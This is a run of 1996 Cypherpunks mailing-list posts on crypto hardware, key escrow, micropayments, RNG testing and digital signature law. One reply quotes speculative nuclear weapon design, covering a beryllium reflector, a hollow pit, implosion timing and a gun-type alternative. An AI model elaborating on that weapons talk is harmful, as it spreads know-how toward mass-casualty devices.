In-Reply-To: <Pine.3.89.9602202308.D7708-0100000@wane3.scri.fsu.edu>
Message-ID: <199602221313.IAA09759@homeport.org>
MIME-Version: 1.0
Content-Type: text


P.J. Ponder wrote:

| obligatory crypto comment: has anyone looked at the iPower card and 
| gotten one to play with? Where else could one get a PCMCIA card that was 
| programmable and had a little memory on it? How hard would it be to make 
| one - in other words, what could we get the cost down to for an 
| encrypting pcmcia card? there couldn't be much to it, really, could there?

	I got one, its very badly documented; theres some source in
Visual basic for windoze.  I haven't had time to track down real docs
so I can do anything.  Anyone know who I can call to get real
documentation?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 22 Feb 1996 21:26:06 +0800
To: weidai@eskimo.com>
Subject: Re: "and two forms of ID"
Message-ID: <v02120d01ad520bec063a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>You got my position completely backward on this.

I feel much better now. :-). I really didn't want to cross swords with
someone who's S/N ratio is as high as yours is around here.

>You may be thinking of what I said about the
>cost of defeating traffic analysis.

That must have been it.

>The natural state of the Net seems to be a kind of semi-anonymity.

Ah. I believe this is what I'm talking about...

>Trying to push it in either direction (complete traceability or
>anonymity) is costly.

I'm going to build a rant about this pretty soon, but I think that in a
geodesic network, audit trails of any kind cost more money, particularly in
the "fringes" of the network, where all the processor growth is going to
happen, assymetries or not. As processors handle smaller and smaller stuff
faster and faster, it becomes harder and harder to "control" and monitor
all of them. To operate efficiently, they have to be more and more
autonomous.

One way to provide decision rules for autonomous processors is to introduce
micro-e$ auction markets into the net's infrastructure. A good example
might be packet routing. Suppose you attach some very skinny money to a
packet  (something issued with Micromint, maybe?), and strip it off as the
packet goes through the network, sender pays.  Routers price their
throughput based on their load at any given moment. When you create this
"economy of switches", it becomes harder to establish the hierarchical
book-entry control/coodination models we all know and love, certificate
hierarchies among them.

I think that something like this might work as a way of randomizing traffic
in a network of remailers, by the way. Let the market determine the
remailer path. Specify the number of hops left, and attach enough money for
that number of hops. This is one way for people to pay for the use of
remailers, and eventually, it could map to packet-level-anonymity someday.

For the moment, I'm going to claim that anonymous auction markets are
always more efficient than identified, command economies, just like flight
is faster than surface travel.

At least that's what I think this morning. :-). More as I get some time.

However, I do agree that it's foolish to simply declare that everything
must be unauditable, just as it is to declare universal auditability. It's
better to let the market figure this out. ;-).

Cheers,
Bob Hettinga










-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Feb 1996 22:11:52 +0800
To: cypherpunks@toad.com
Subject: Re: IBM Breakthrough?
Message-ID: <199602221351.IAA14781@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by mpd@netcom.com (Mike Duvos) on Wed, 21 Feb 
 9:3  PM

>Those wishing to read IBM's explanation of this new 
>technology  may browse their Web page on Quantum 
>Teleportation at...
>  
>http://www.research.ibm.com/quantuminfo/teleportation/


   Thanks much for your precis and the IBM pointer. 

   IBM's ad seems inspired by Clarke's "Any sufficiently
   advanced technology is indistinguishable from magic."

   The teleportation site hiply introduces the topic with 
   its science fiction ancestry.  The site even has a link to
   the "goulash" featured in the ad, so the tease is PR for
   IBM's magical research explorations.

   It was illuminating to read the tie of teleportation to
   quantum research -- cryptograpy, communication and who
   knows what else burbling in that wizard Watson lab.

   Because my Lynx could not get into IBM's "quantum
   cryptography," perhaps Blue is onto some Lotus-like 
   Q-Crypto soon to be teased in ads for cosmos-wide Net
   security or surveillance-proof chips and goulash.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Feb 1996 22:30:20 +0800
To: cypherpunks@toad.com
Subject: ASS_alt
Message-ID: <199602221415.JAA16726@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   EcoMist of Feb 17 has more on The Seychelles lure for
   wealthy outlaws; a look at Richleson's new book on spying;
   and the assault on Swiss vaults for outlaws and spies by
   outlaw, spying prosecutors.


   ASS_alt (for the 3)


   [Thanks to AS]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 22 Feb 1996 23:31:03 +0800
To: "E. ALLEN SMITH" <CYPHERPUNKS@toad.com
Subject: Re: Edupage, 20 Feb 1996
Message-ID: <2.2.32.19960222150734.00720bd0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>>EUROPE BACKS V-CHIP
>>The European Parliament has followed the lead of the United States in
>>supporting the use of Canadian-developed V-chip technology that allows
>>parents to screen violent or adult content from their televisions.
>>(Montreal Gazette 20 Feb 96 C7)

Why, Oh why is there so so much talk about the V Chip.  This stupid device
only covers over-the-air broadcast TV a dying part of the spectrum.  It does
not cover cable-only programs (HBO, etc) and it does not cover net-based
audio and (soon) video programming.  It is meaningless.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Fri, 23 Feb 1996 01:27:29 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: pcmcia
In-Reply-To: <199602221313.IAA09759@homeport.org>
Message-ID: <Pine.SCO.3.91.960222100744.19971A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Feb 1996, Adam Shostack wrote:

> P.J. Ponder wrote:
> 
> | obligatory crypto comment: has anyone looked at the iPower card and 
> | gotten one to play with? Where else could one get a PCMCIA card that was 
> | programmable and had a little memory on it? How hard would it be to make 
> | one - in other words, what could we get the cost down to for an 
> | encrypting pcmcia card? there couldn't be much to it, really, could there?
> 
> 	I got one, its very badly documented; theres some source in
> Visual basic for windoze.  I haven't had time to track down real docs
> so I can do anything.  Anyone know who I can call to get real
> documentation?
> 

We've been doing some work with the thing and have actually got a crypto 
product built for a customer.  Some things to know:

1.  It' unbelievably slow.  Key generation on this things takes an order 
of magnitude longer than what you see in the "average" PC environment.  
Encrypt/decrypt times are equally extended, but aren't that obnoxious if 
5-20 second/'average' e-mail message lag times don't torque your user.

2.  Buy the PersonaCard API Developer's Kit or you're hosed.  It's the 
only real source of relevant data.  It's got Visual C++ source in it, 
etc.  You also can then contact Nat-Semi with questions.  You can order 
the thing (I think it's around $100, but I'm not sure) from:

iPower Technical Support
iPower Business Unit
National Semiconductor Corporation
1090 Kifer Road, Mail Stop 16-225
Sunnyvale, CA 94086-3737

3.  The drivers suck.  They appear to be essentially a "protocol stack" 
that gets loaded into memory (LOTS of memory) and then they conflict with 
just about everything.  Lock ups are common.  These things have to load 
in sequence, before anything else, or they won't work.  We have not been 
able to get them to peacefully coexist with any other PCMCIA drivers, nor 
with such things as CD-ROM drivers or tape backup drivers.

Summary:  A fun thing to play with, interesting toy, but probably not 
something you can actually make useful (yet).

Enjoy.

------------------------------------------------------------------------- 
|So, I went walking through the street.   |Mark Aldrich                 | 
|I saw you strung up in a tree.           |GRCI INFOSEC Engineering     | 
|A woman knelt there, said to me,         |maldrich@grci.com            | 
|Hold your tongue, man, hold your tongue. |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Fri, 23 Feb 1996 01:21:59 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <9602221542.AA03476@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>> This looks completely, totally, and insanely bogus, but I need some
>> kind of verification for this bizarre little piece of mail that
>> somehow ended up in my mailbox.
>
>If you really need verification, there's no one with the last name of
>"Dereksen" on MIT's directory (which lists students and staff; "finger
>dereksen@mit.edu"), and there's certainly no departments at MIT called
>the "Main branch" or "Interconnected Network Maintenance staff".
>
>At least this one is funny.  I particular like the beginning: "It's
>that time again!"

And BTW, since they told you to disconnect your machine from the net, 
*where* exactly are they gonna find "lost e-mail" ?  Lying around
*clogging* telephone wires and optical fibers?  :-)

I can just picture the usual disclaimer:
WARNING: FIRE HAZARD!
if you let old, undiscarded e-mail accumulate in your modem/computer
it might catch fire!  E-paper is just as flamable as the regular one...

ROTFL!
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Fri, 23 Feb 1996 01:13:33 +0800
To: cypherpunks@toad.com
Subject: [humor] What is an elephant?
Message-ID: <9602221542.AB03476@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


In a conversation where jim bell, black unicorn and brian davis discussed
such things as nuclear detonator and high explosive reciepes, the following sentence was written:

>Chances 
>are that "military-grade" accuracies are straightforwardly possible.


Q: What is an elephant?

A: A mouse, built to MIL specs...

JFA
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Fri, 23 Feb 1996 03:16:58 +0800
To: cypherpunks@toad.com
Subject: Re: A Challenge (perhaps!)
Message-ID: <2.2.32.19960222184558.006a4aa0@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 AM 2/22/96 -0600, m5@dev.tivoli.com (Mike McNally) wrote:

>The way I like to think of such a scheme is to consider the secret
>algorithm itself to be the key, which then drives the cryptosystem
>composed of the CPU instruction sequencer on the encrypting machine.
>Thus all messages are encrypted with the same key; it should be easy
>to see why that isn't secure.

That's a very effective way of putting it. I like that.

As it happens, it appears that I may have persuaded yet another developer
what I Strongly Suspect to be hideously insecure to post info here, or have
me do it. Turns out he's genuinely interested in doing it right. I _really_
hope this turns into a trend :-) - two in one week is pretty nifty. Good
will is a precious thing.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Sat, 24 Feb 1996 04:50:35 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: pcmcia
In-Reply-To: <199602221313.IAA09759@homeport.org>
Message-ID: <Pine.3.89.9602221008.B12023-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am just assuming that the Association (PCMCIA) has a way of distributing
specs, etc. I also assume they have a web page and all that, maybe 
even a citizen-unit subscribed to this mailing list who probably could
point us in the right direction.  I think PCMCIA cards offer a lot of
potential as wallets and general purpose privacy prophylaxis engines.
I don't know anything about the technology, but the device drivers, et al,
could be publicly reviewed and recompiled on trusted machines, presumably,
and the device itself could be tested (I assume) with a publicly 
available routine that once again one could install from source, etc. 

how much do the slots cost to add on to pc's that don't already have them?
Is there a parallel interface, for instance, that can plug into a 
printer port?
--
PJ
------------------------------------------------------------------------

On Thu, 22 Feb 1996, Adam Shostack wrote:

> P.J. Ponder wrote:
> 
> | obligatory crypto comment: has anyone looked at the iPower card and 
> | gotten one to play with? Where else could one get a PCMCIA card that was 
> | programmable and had a little memory on it? How hard would it be to make 
> | one - in other words, what could we get the cost down to for an 
> | encrypting pcmcia card? there couldn't be much to it, really, could there?
> 
> 	I got one, its very badly documented; theres some source in
> Visual basic for windoze.  I haven't had time to track down real docs
> so I can do anything.  Anyone know who I can call to get real
> documentation?
> 
> Adam
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 23 Feb 1996 03:58:04 +0800
To: cypherpunks@toad.com
Subject: Stop by HotWired's Club Wired tonight...
Message-ID: <Pine.3.89.9602221112.A1296-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


In the spirit of unabashed self-promotion... -Declan

---------- Forwarded message ----------
Date: Thu, 22 Feb 1996 07:03:00 -0800 (PST)
From: Jon Lebkowsky <jonl@well>
To: Declan McCullagh <declan@well>
Subject: tonight

I'm spreading the word about our HotWired discussion tonight... if you
want to post the info anywhere, here's the extract:

Electronic Frontiers Forum, Club Wired
http://www.wired.com/club
telnet://chat.wired.com:2428                

                Thursday, 22 February:
                7 p.m. PST (Friday 03:00 GMT)
                Online activist Declan McCullagh discusses recent
                attempts at direct and indirect censorship of content on
                the Internet.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jon Lebkowsky <jonl@well.com>                      http://www.well.com/~jonl
Electronic Frontiers Forum, 7PM PST Thursdays <http://www.hotwired.com/club>
Vice President, EFF-Austin                     <http://www.io.com/~efaustin>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 23 Feb 1996 01:31:43 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <9602221320.AA16955@alpha>
Message-ID: <96Feb22.110840edt.10494@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> ...and note that IPG does us the favor of ensuring the keys conform to
> this elaborate battery of statistical tests.  Thus, there are bunches
> of keys that "aren't random enough" and thus not among the set to be
> considered when trying to break one.

I wouldn't fault them on that.  For example, let's say they have a
sample of 1000 bits.  They count the number of 1 bits, and discard
any samples that have less than 450 or more than 550.

They have thrown away a number of bits of entropy here.  Somewhere
between 10 and 100 at a guess -- my combinatorics is nonexistant.
So what?  There are plenty of bits there still.  If they really
are using 5600 bit keys, they can afford to lose some and still be
invulnerable to brute-force attacks.

What they have gained is the knowledge that their random number source
isn't broken.  If your RNG started spewing 0 bits by the thousand would
you say "This stream is just as likely as any other stream that I can
imagine so there is no problem", or "My RNG is broken".  Of course,
in nice mathematical abstractions your RNG never breaks, but we live in
a nasty world of thermal failiures and cold solder joints.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 23 Feb 1996 04:30:26 +0800
To: jimbell@pacifier.com
Subject: NOISE Re: Easy Nuclear Detonator
In-Reply-To: <m0tpV8K-00091iC@pacifier.com>
Message-ID: <u9LLx8m9LQ8L085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0tpV8K-00091iC@pacifier.com>,
jim bell <jimbell@pacifier.com> wrote:

> At 11:00 PM 2/21/96 -0500, Black Unicorn wrote:
> >On Mon, 19 Feb 1996, Brian Davis wrote:
> >
> >> On Mon, 19 Feb 1996, jim bell wrote:
> >> 
> >> > it just didn't occur to me that you'd object to this.  "Nettiquette" is new
> >> > to me.
> ^^^^^^^^^^^^^^^^^^ > 
> >>   ^^^^^^
> >> 
> >> No shit.
> >
> >So, it would seem, is nuclear weapons design.
> 
> I wrote this just a few hours ago.  Let's have a vote:  Who thinks I have 
> some idea about the subject?

[snip]

> I forgot about the beryllium.  Beryllium, I understand, is described as a 
> "neutron reflector".   Now how GOOD a neutron reflector it is I don't know, 
> but if you're trying to make a bomb with the smallest amount of material at 
> the primary's core it would help a great deal to have a neutron reflector.  
> Presumably, it would be used to coat the inside of the "hammer."  If 
> beryllium were a "perfect" neutron reflector, you could use arbitrarily low 
> amounts of plutonium or U-235 as the core (analogy:  If you were in a room 
> with walls which were perfect mirrors, and "you" were invisible, you would 
> see "forever" and the volume of space you were in would appear to be 
> infinite), and you could make the core as small as you want.  (But it isn't, 
> so the improvement effected by beryllium is limited.)
> 
> It might also help to make the "pit" hollow, but I don't know about that.  
> This might assist in the mechanical impedance match, too.  If you could get 
> the chemical implosion timed  "just right" you might be able to get away 
> with using a really THIN layer of plutonium that crashes together at the 
> core.  This might provide optimum densification because you would be able to 
> accelerate the hollow plutonium sphere centrally at near-detonation-velocity 
> speeds, which would result in very effective density increases.

I vote that you don't know jack shit about bomb design.

If you don't have a properly-designed initiator at the core, an implosion
device is just a mess of high explosives surrounding a dense metal object.

Stick to a gun device; it's tried-and-true.  The yield is lower, but at
least it works.


- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMSzAt+VevBgtmhnpAQEX1gL+MOIeJF/0BpM0nUn+Rv8AQoMsS8DdXsOn
jhU8ABxWz4mKhhKH+QA6iq7RIPz56DItnZ4hrAwmGS8NQ2q+f2LpgRnBhG+3kDK+
jJ29JJ7uJIuQBzQdn/BNFpGQzYD4UrLu
=Oubq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: juggy@cerc.wvu.edu (V. "Juggy" Jagannathan)
Date: Sat, 24 Feb 1996 04:51:05 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Patient medical files on Net
In-Reply-To: <199602211521.KAA06043@homeport.org>
Message-ID: <9602221611.AA13184@cerc.wvu.edu>
MIME-Version: 1.0
Content-Type: text/plain




Dear all:

We are pleased with the national attention the ARTEMIS project of the
Concurrent Engineering Research Center(CERC) sponsored by NLM has
attracted. On February 20, there was an article in
the Wall Street Journal calling ARTEMIS an "audacious experiment" by a
rural physician in West Virginia, Dr. Bruce Merkin, M.D. This was
followed by an ABC Evening News story with Peter Jennings (Feb 21,
Wednesday) which declared Dr. Merkin is "the future."

While we  are most happy to receive this attention, we are also
concerned that some people may erroneously draw the conclusion that we
are jeopardizing patient confidentiality by "putting their records on
the Web." We are both  extremely security conscious and thouroughly
familiar with all the available security technologies. We have taken a
number of steps to ensure that our experiment will not be compromized:

1. The patient records are on the INTRAnet which is secured with a
firewall and we continously monitor and evaluate the efficacy of this
protection.

2. Standard UNIX network security mechanisms with all the known security
holes addressed and verified with programs such as "Satan"

3. Multiple levels of access controls, role-based access controls,
user-id based access controls - implemented using Oracle DB mechanisms

4. Audit trails as a separate CORBA-service to track all transactions
and accesses to any patient information

We can add additional layers such as classification of sensitivity of
information, stripping patient identifying information etc as our core
infrastructure is based on CORBA.  We have and continue to experiment
with a number of security technologies. We have in our research
testbed prototypes of systems using Kerberos, PGP, MOSS, and RSA-based
public-key server technologies. We are currently investigating
commercial security technologies and technologies that can securely
bridge World Wide Web and distributed object technologies and CORBA
standards promoted by OMG. Until a satisfactory implementation of
security and a market acceptance of the mechanisms using these
emerging and potent technologies are in place, confidential patient
information will NOT be put in the "Internet".


Sincerely

Ramana Reddy, CERC
V. "Juggy" Jannathan, CERC 
Bruce Merkin, Valley Health Systems Inc.

Co-Principal Investigators

------------------------------------------------------------------
            Ramana Reddy (Also known as Y. V. Reddy) 
            Director
            Concurrent Engineering Research Center
            West Virginia University
            Morgantown, WV 26506
       e-mail: rar@cerc.wvu.edu
-------------------------------------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 23 Feb 1996 05:07:45 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: "consent of the governed"
In-Reply-To: <Pine.ULT.3.91.960221153531.2872F-100000@Networking.Stanford.EDU>
Message-ID: <199602221939.LAA26638@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves <llurch@networking.stanford.edu>

>You're taking this phrase out of context. What the Declaration said was:

true, I didn't put in the associated reasoning.

>1. There are certain universal human rights, like life, liberty, and 
>   property^H^H^H^H^H^H^H^H the pursuit of happiness.
>2. To protect these rights, people form governments. Only the baddest kid 
>   on the block can protect her own rights, and only if she never sleeps. 
>   The rest of us need the police.

I tend to define government more liberally in that it does not
merely exist to protect rights-- the 20th century saw a rise in
government that tried to be a social force. this may have failed, 
but it does point out that people want a government to do more
than merely protect their rights.  in other words, the 1776 definition
of government is reasonably slightly modified. government in its
essence is a form of organized human collaboration/cooperation imho.
it is a nervous system for a society.

>3. Ergo, government derives its just powers from the consent of the 
>   governed. I read this more as a conclusion than as a premise.

I think it is both. it is a conclusion of the reasoning and the 
premise for government. if the government does not have the
consent of the governed, it is not a legitimate government-- that
is the basic implication.

>This is all that Hobbes, Locke, and Montequieu said. Rousseau was 
>different, but he was a kook.

ah, but all great visionaries are usually first considered kooks.
the whole idea that government exists by consent of the governed
was a quite radical idea challenging the existing dogma of divine
right of kings.

>This is quite different from saying, "The government has the right to do
>what the majority says it can do." Government doesn't have any rights,
>only delegated powers.

that's what I tried to point out. it all hinges on the phrase, "the
government exists by the consent of the governed".

I don't really see how any of your points are contrary to anything
I wrote in the essay, despite your seeming to present them as if they
are.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pp@pfawww.pp.se (Per Persson)
Date: Thu, 22 Feb 1996 23:47:27 +0800
To: "Ben A. Mesander" <ben@gnu.ai.mit.edu>
Subject: Re: new "obscenity" law on the net
In-Reply-To: <199602031732.KAA04018@goldman.gnu.ai.mit.edu>
Message-ID: <y3yivgzk3z6.fsf@ojnk.bahnhof.se>
MIME-Version: 1.0
Content-Type: text/plain


[Ben sent this to rms at 'Sat, 3 Feb 1996 10:32:00 -0700'];

"Ben A. Mesander" <ben@gnu.ai.mit.edu> writes:

>Just curious - will the new law outlawing obscenity on the net in the us
>cause you to make changes to some of the comments in the emacs source code?

Some weeks ago, Lars and Richard went through the Gnus source and
removed 'fuck' two times and 'fucking' one time (if I didn't get it
all wrong). I wonder if that's your fault.

/pp.

-- 
anum meum aperies, asperge me spermate tuo et inquinabor
url; http://pfawww.pp.se/~pp/   email; <pp@pfawww.pp.se>
phone#'s;  work/home/fax: +46 (0)18 100899/247473/103737





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 23 Feb 1996 03:32:47 +0800
To: cypherpunks@toad.com
Subject: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <ad51f4aa1602100416de@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 PM 2/22/96, Carl M. Ellison wrote:
>http://www.tis.com/crypto/cke.html
>
>have you guys checked out this page recently?  It shows TIS's change
>to a dual [domestic, international] approach to key recovery.
>

I hadn't looked at the TIS site in a while, so thanks for the heads up.

I just looked at it, and am not cheered by what I see. It looks to me that
any company with international sites it wishes to include in its overall
system (meaning, integrating key recovery in overall communications), must
use the more restrictive Commercial Key Escrow (tm) system:

"CKE meets the following U.S. Government requirements: 1.) tamper-resistant
escrow functionality, 2). no interoperation with non-export-approved
cryptosystems, 3). Data Recovery Centers must meet government ownership
qualifications, and 4). escrow access must be available at either end of a
communication (sender or receiver)."

Item #2 indicates that a company or organization--such as Intel or Amnesty
International or Bank of America--has two choices:

1. Use the stronger Commercial Key Recovery (CKR) for domestic
communications, the weaker, BB-Enabled (Big Brother-Enabled) Commercial Key
Escrow for offshore sites, with no interoperability...

or

2. Use the BB-Enabled CKE for all communications, thus allowing domestic
sites to communicate with their offshore sites.

My hunch is that NSA is hoping that the escrowed system, complete with weak
64-bit keys!, will be adopted as the default system, thus allowing one less
system to worry about and letting multinational companies (and what company
isn't multinational these days?) use one system. Or that Netscape and other
such companies will adopt CKE as a standard.

I haven't studied the Commercial Key Recovery (CKR) variant....I'm no
expert on these confusing protocols and see no need to become one. It is
also complicated, and it's not clear to me just how free users are to
select, say, their grandmother or their lawyer, as the holder of their
"lockbox key." I'm not claiming they're not free to do so, just that CKR
may also have unacceptable intrusions into private communications that
aren't obvious from the TIS statements I read. (The TIS statement points
out that: "Separate licensing arrangements are necessary for organizations
desiring Data Recovery
Center ownership.", so there is the chance that if I want Grandma to be my
spare key holder she might have to pay bucks to TIS and pass their
scrutiny...if so, not a very nice option, and one which could turn even CKR
into BB-Enabled software with a change in DRC policies...see point below.)

One thing to look out for is a TIS/Netscape/Lotus/etc. situation wherein
both services are offered, but the BB-enabled version is much easier to get
approval for, or even easier to set up and use, so that the skids are
greased in favor of the BB-enabled version and companies just say, "Oh, to
hell with the CKR version, let's just standardize on CKE...we have nothing
to hide."

Another thing to look for is any structural evidence in the specs for CKR
that indicates it could be "turned into" the CKE BB-Enable version by the
flip of a switch. What I mean by this is that we should always be wary of
systems which look to preserve liberties but which can be "switched" easily
once widely deployed. (Not to make a gun rights argument here, but this is
essentially what the folks worried about "gun registration" are concerned
about: any system in which guns can be registered could be converted with
the stroke of a pen into a system for confiscation; this is the main reason
they fight gun registration. I would look to see if any such parallels can
be found in the CKR variant: can the CKR variant be turned into the CKE
variant when President Buchanan decides he's had enough of these U.S.
companies communicating with those foreigners and their un-Christian ways?)

Be worried, be very worried.

(Side note: Of course, we're back to asking what the policies of the
offshore site countries may be. Imagine how thrilled the Department of
Commerce and NSA will be when Intel informs them that the government of
Japan insists that all communications with Japanese sites must use "Nippon
Key Escrow," to ensure that Chobetsu (Japanese NSA) can read Intel's
discussions of chip yields and production plans. Or that Israel wants the
Jew bits set....)

Thanks, TIS, for putting a "Big Brother Inside" sticker on your products.

No thanks.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Buchanan <pat@next.stop.is.the.white.house>
Date: Fri, 23 Feb 1996 08:53:25 +0800
To: cypherpunks@toad.com
Subject: Here I come.
Message-ID: <199602220430.MAA29247@infolink2.infolink.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear boys.

Enjoy this list while you can.

Signed
Pat






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 23 Feb 1996 05:51:54 +0800
To: "C. Bradford Biddle" <biddle@pwa.acusd.edu>
Subject: Re: Digital Signature Legislation (fwd)
Message-ID: <199602222030.MAA04720@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  20:54 AM 2/20/96 -0500, C. Bradford Biddle <biddle@pwa.acusd.edu> wrote:
>---------- Forwarded message ----------
>
>DIGITAL SIGNATURE LEGISLATION: SOME REASONS FOR CONCERN
>
>[Copyright 1996 by Brad Biddle; permission granted for non-commercial 
>electronic redistribution]
>
>...

>LIABILITY
>
>The Utah Act makes two policy choices concerning liability allocation
>Under the Utah Act, consumers are held to a negligence standard in
>guarding their private encryption key. Thus, if a criminal obtains a
>consumer's private key and commits fraud, the consumer is financially
>responsible for that fraud unless the consumer can prove that the consumer
>used reasonable care in guarding the private key. ...

One important point here is what is "reasonable care"?  In a very real
sense, all consumer computer operating systems are not secure.  I have
posted a theoretical virus born attack on PGP's secret key to the
cypherpunks mailing list (archives at http://www.hks.net/cpunks/). 
Nathinal Borenstein of First Virtual has posted to the same list, a
description of a partially implemented attack on credit card numbers which
has received heavy response.  If there is enough reward, these attacks will
occur.

The question I have is, does "reasonable care" include keeping your machine
"virus free"?  


>There is a second troubling policy choice relating to liability. The Utah
>Act limits the potential liability of one actor in the infrastructure --
>the certification authority -- to a fixed amount (termed a "suitable
>guarantee" and determined by a complex formula or by administrative rule).

The historic precedent is the liability limit on nuclear power plants.

For both these problems, a relatively low liability limit would force
people to use other techniques (e.g. old style signed contracts) for large
transactions.  While we are working the bugs out of a new technology, with
new standards of "reasonable care", everyone might win if the risks are
limited.


>PRIVACY

I believe the area of privacy is where the real problems lie.  I will let
other, more qualified, people suggest alternatives to the Utah law
proposal.


>
